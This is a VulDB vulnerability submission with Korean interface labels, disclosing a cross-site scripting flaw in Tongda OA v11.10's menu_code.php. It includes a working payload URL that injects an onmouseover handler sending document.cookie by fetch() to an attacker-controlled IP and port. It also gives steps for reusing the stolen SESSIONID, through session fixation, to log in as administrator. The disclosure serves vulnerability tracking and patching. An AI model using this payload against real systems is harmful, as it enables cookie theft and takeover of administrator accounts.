| 제목 | The presence of xss in Tongda v11.10 may allow an attacker to obtain the administrator cookie to log in to the backend |
|---|
| 설명 | Hi~, I found an xss in Tongda OA v11.10, which can leak the administrator cookie through a malicious link constructed by the attacker. At the same time, V11 has session fixation, and the attacker can log in to the administrator background through the obtained SESSIONID.
The reproduction process is as follows:
Construct the payload:
http://xxx.xxx.xxx.xxx/general/ipanel/menu_code.php?MENU_TYPE=FAV&OA_SUB_WINDOW=)%df%22onmouseover=fetch(`http://192.168.110.160:4444?${document.cookie}` );//%df%22
Listen on port 4444 on the attacker server,when the victim clicks on the link and the mouse hovers over the word "Settings"
Then you can splicing after /general/index.php ?SESSIONID=xxx (obtained SESSIONID) to log in to the administrator background
Official website: https://www.tongda2000.com/
Version: v11.10, v2017
Route: general/ipanel/menu_code.php
|
|---|
| 원천 | ⚠️ https://github.com/Mykonos-x/cve/tree/main/cve/tongda/v11/xss |
|---|
| 사용자 | AnatomyX (UID 45354) |
|---|
| 제출 | 2023. 09. 12. PM 02:55 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 09. 16. PM 02:34 (4 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 239868 [Tongda OA 11.10 menu_code.php?MENU_TYPE=FAV OA_SUB_WINDOW 크로스 사이트 스크립팅] |
|---|
| 포인트들 | 20 |
|---|